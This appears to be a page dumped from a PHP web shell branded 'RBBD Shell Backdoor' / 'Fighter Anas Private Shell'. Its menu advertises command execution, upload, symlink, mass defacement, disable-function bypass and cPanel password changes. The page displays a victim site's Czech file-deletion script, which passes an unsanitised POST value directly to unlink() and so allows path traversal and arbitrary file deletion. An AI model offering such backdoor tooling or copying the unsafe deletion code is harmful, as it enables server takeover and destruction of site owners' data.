⚜ RBBD Shell Backdoor ⚜
Current Dir
:
D:
/
php
/
soubor
/
Home
Upload
Command
Config
Jumping
Symlink
Mass Deface
Bypass Disable Function
K-RDP 5H3LL
Adminer
Change Password cPanel
Zone-H
Current File : D:/php/soubor/smazani_souboru.php
<?php if(isset($_POST['smazat'])) { $smazat= $_POST['smazat']; unlink ("soubory/".$smazat); header('Location: smazani_souboru.php?smazano=ano'); exit; } ?> <!doctype html> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Smazání souboru</title> </head> <body> <style> hr { margin-top: 15px; padding: 0; } </style> <?php $handle=opendir('soubory'); while (false!==($file = readdir($handle))) { $file = iconv('Windows-1250', 'UTF-8', $file); // překódování řetězce z jednoho kódování do druhého if ($file != "." && $file != ".." && $file!=="Thumbs.db") { echo '<a href="soubory/'.$file.'" target=\"_blank\">'.$file.'</a> '.$file; ?> <form action=" <?php echo $_SERVER['PHP_SELF']; ?>" method="post"> <input type="hidden" name="smazat" value="<?php echo ($file); ?>" /> <input type="submit" value="smazat" /> </form> <hr> <?php } } closedir($handle); ?> </body> </html>
Fighter Anas Private Shell V.1 -
Royal
Battler BD
Copyright © Fighter Anas